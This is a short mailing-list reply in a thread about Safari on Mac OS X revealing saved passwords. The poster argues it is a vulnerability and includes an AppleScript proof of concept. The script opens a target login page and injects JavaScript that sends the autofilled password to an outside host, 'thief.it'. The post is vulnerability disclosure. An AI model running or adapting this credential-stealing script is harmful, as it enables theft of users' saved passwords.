Re: RE: Apple Safari on MacOSX may reveal user's saved passwords
Mark, you read it correctly and you're right, anyway a malicious user at your
console should not be able to read your passwords. Also note that to steal
saved passwords it's sufficent to entice a victim to execute a malicious script
like that:
--BOF
tell application "Safari"
open location "https://www.target.com"
end tell
do shell script "/bin/sleep 10"
tell application "Safari"
do JavaScript
"document.location.href='http://thief.it/steal_target?p='+document.loginform.password.value"
in document 1
end tell
--EOF
I agree with you in saying that the execution of malicious scripts can lead in
much more dangeruos attacks, anyway i consider this a vulnerability and i dont
know why Apple belives this is the correct behaviour. . .
many thanks for your comment
-p